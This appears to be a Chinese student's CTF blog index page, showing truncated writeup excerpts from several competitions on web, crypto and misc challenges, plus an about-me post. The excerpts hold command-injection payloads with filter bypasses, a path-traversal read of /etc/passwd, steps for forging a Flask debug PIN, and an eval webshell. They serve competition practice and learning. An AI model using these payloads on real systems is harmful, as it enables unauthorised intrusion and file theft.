复现计划——DASCTF X GFCTF 2024|四月开启第一局
下一篇NewStarCTF 2023,回到梦的起点
Web
cool_index
查看server.js
import express from "express";import jwt from "jsonwebtoken";import cookieParser from "cookie-parser";import crypto from "crypto";const FLAG = process.env.DASFLAG || "DASCTF{fake_flag}";const app = express();app.use(express.json());app.use(cookieParser());app.use(express.static("static"));app.set("view engine", "ejs");const JWT_SECRET = crypto.randomByt ...
第九届中国海洋大学信息安全竞赛wp
Web
ezPHP
<?phpinclude "flag.php";highlight_file(__FILE__);error_reporting(0);$a = 'O.U.C';$query = $_SERVER['QUERY_STRING'];parse_str($query);if (preg_match('/_|%5f|\.|%2E/i',$query)){ die('听说你是黑客');}echo '你知道b等于什么能绕过这个弱类型吗(〃` 3′〃)'.'<br>';if (md5($a)==md5($_GET['b'])&&$a!=$_GET['b']){ echo "哎呦,不错喔".'<br>'; $O_U_C=$_GET['O_U_C'] ...
XYCTF2024wp
复现网址:gz.原神师范大学.cn
Web全解,好像是Java反序列化全场唯一解?
https://blog.csdn.net/qq_39947980/article/details/138249895
Crypto方向大佬
https://dexterjie.github.io/2024/04/26/赛题复现/2024XYCTF/#Crypto
Web
Web ezmake
题目提示flag在当前目录下,直接读一下flag试试?
url/flag
算是非预期了
去了解一下makefile究竟是怎么读取文件的
https://www.yisu.com/ask/27496422.html
content := $(shell cat flag)
Web ezhttp
robots.txt,得到账号密码
Referer: yuanshen.comUser Agent: XYCTFClient-IP: 127.0.0.1Via: ymzx.qq.comCookie: XYCTF
记一个常用的请求头
X-Forwarded-For:127.0.0.1Client-ip:127.0.0.1 ...
PolarCTF2024春季个人挑战赛wp
【CRYPTO】周杰伦的贝斯
题目👊👢👧👉👎🐽👅👁👈🐧👉👆👈👣👟👐👊👱🐧🐰👇👈🐴🐴
其实就对应附件的名字100_64_32
base100(或者说是Emoji表情符号)->base64->base32
得到Jay Chou
flag:
flag{Jay Chou}
【CRYPTO】rsaaa
from Crypto.Util.number import *e = 65537p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483q = 118748438379802970320924058486536568527609101545433809076500401907042833589092085782510630477324439922306479 ...
VenomCTF2024wp
嘶,纳新赛,是真的要拿出实力才行的
真好,不出意外,Web成功爆零了QWQ
签到完,就打了一道crypto,rank 174
Misc-checkin
老样子,第一步先耍一哈游戏,然后看js代码,game.js没发现什么东西
然后在控制台或index.js发现Quick pass cheat: I heard that Venom is ChaMd5’s, here is a mysterious string for you. 88d18c420654d158d22b65626bc7a878
找个靠谱的网站进行MD5解密。。。
https://www.somd5.com/
好家伙,写wp的时候,这玩意又解不出来。。。我记得用的是这个网站的
Crypto-狂飙
key = os.urandom(24)key = bytes_to_long(key)n = m % key
已知n和m,解出key,这道题目就出了
嘶,一开始真的想,随机生成key来看看能不能直接get,发现没什么卵用,数量实在是太多了
同时,我们可以得到key是m-n的因子,然后直接对m-n进行了分解,得到
k = [ ...
NSSCTF_Round#19_Basic_Crypto专场
本次比赛是密码专场,今天三场比赛要打QWQ
就打了第一道QWQ
bestkasscn的超级简单密码
题目:
p = getPrime(1024)i = 0while True: r = p * 5 + i if isPrime(r): i = 0 break else: i += 1while True: q = p * 10 + i if isPrime(q): break else: i += 1n = p * q * re = 65537c = pow(bytes_to_long(flag.encode()), e, n)print('c=' + str(c))print('p3=' + str(pow(p, 3, n)))print('q3=' + str(pow(q, 3, n)))print('r3=' + str(pow(r, 3, n)))
本题的突破点是p
不难发现p3是p的倍数,分 ...
Noting Something About Me
Welcome To My Noting Blog!
2022.8.28 Hello SCNU
会是梦的起点吗:(
中间省略摆烂的一年
…………
2023.7.15 Hello CTF
要一路黑到底了
2024.2.14 Hello My First Blog
I’m HvAng
一名爱好网络安全(真打算吃这口饭了)的计算机专业学生,22年高考进入了这所大学
从未(也不能太绝对,但也只是一丢丢,是个纯小白)接触过电脑的我,踏上了计算机这条不归路(bushi)
大一摆烂仔(不提也罢,后悔了,去他妈的考上大学就轻松了,真不能浪费时间啊,至少不能用于摆烂啊,真就浪费了我最宝贵的第一年,输在起跑线了),于大一的暑假前一两个月开始接触网络安全(本身专业网络工程,acm连cf都打不明白,没那个天赋和本事,还是CTF收留我)(又是一条不归路),暑假留校学习正式启动我的CTF生涯,可以说我是7月中开始学习CTF的,一个人磕磕绊绊走了两三个月,学了点鸡毛蒜皮(还是太菜啦),几乎以个人之姿拿下校赛二等奖(还是好水啊)
目前,学习方向是Web(当时好入门,确实,但也比较难精进),Crypto(大二 ...
PolarCTF记一道flask-Pin
web-flask_pin
从报错信息中得到url/file?filename=../../../../../../etc/passwd得到用户root可以利用,其他都显示nologin/sys/class/net/ens33/address 得到mac网卡地址系统id:先读取/etc/machine-id,再读取/proc/self/cgroup,并将第一个获取到的值与第二个获取到的id值进行拼接(有docker)(非docker,直接/etc/machine-id)
3.6及以下MD5?3.8及以上sha1?不清楚
import hashlibfrom itertools import chainprobably_public_bits = [ 'root'# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__ ...
PolarCTF2023冬季个人挑战赛wp(web,crypto,misc)
misc
misc-签到喵
经典的公众号签到题
发送宝宝想要flag(这个是base64解码得到的结果)到公众号即可
misc-A 宽宽 S 00 E
U2FsdGVkX19d7TPOqeK+yL2btyx2gt4lp2ErgNwLzytzew9Wu7tcVvsR4tqWzGFi 772B6etLclejBUsSwv/hmg==
零宽字节隐写,vim查看隐写字符,然后找个在线网站得到上面的字符
前段是aes字符,emm也没解出来
后来在群里看见群友在聊发现秘钥是sql,好好好,原来附件给的这个sql注入是这么玩的,然后上面的密文要把空格去掉
https://stackoverflow.org.cn/aesencrypt/
base64解码,加上flag{}就是答案
misc-机密
有个流量包,没看出什么东西,直接binwalk
得到个压缩包,直接爆破,1903
misc-社会主义大法好
一开始ARCHPR识别不了这个压缩包,以为伪加密,结果binwalk分离之后也不行,估计文件格式错了,或者我电脑配置的问题,之前我就把winrar卸了,一般有概率遇到这种情况,直接掏出b ...
FSCTF2023wp
emmm,没时间打,赛后自己做了一部分,跟wp复现了一部分
web- 源码!启动
很简单,虽然F12和右键被禁用,连续按两次F12即可
web-webshell是啥捏
根据表情对应的字母,翻译出
if (isset($_GET['👽'])) { eval(passmhru($_GET['👽']));};
passmhru函数也类似system函数
passthru与system的区别,passthru直接将结果输出到浏览器,不需要使用echo或return来查看结果,不返回任何值,且其可以输出二进制,比如图像数据
差不多同样的用法,直接
/?👽=ls ls /cat /flag.txt
web-hello,you
简单命令注入,用分号隔断命令
1;ls1;ca\t f*
web-细狗2.0
空格绕过、无字母、无回显rce
?hongzh0=1;ca\t$IFS$1/*
web-ez_php1
md5绕过,读文件
序列化
反序列化
<?phphighlight_file(__FILE__);err ...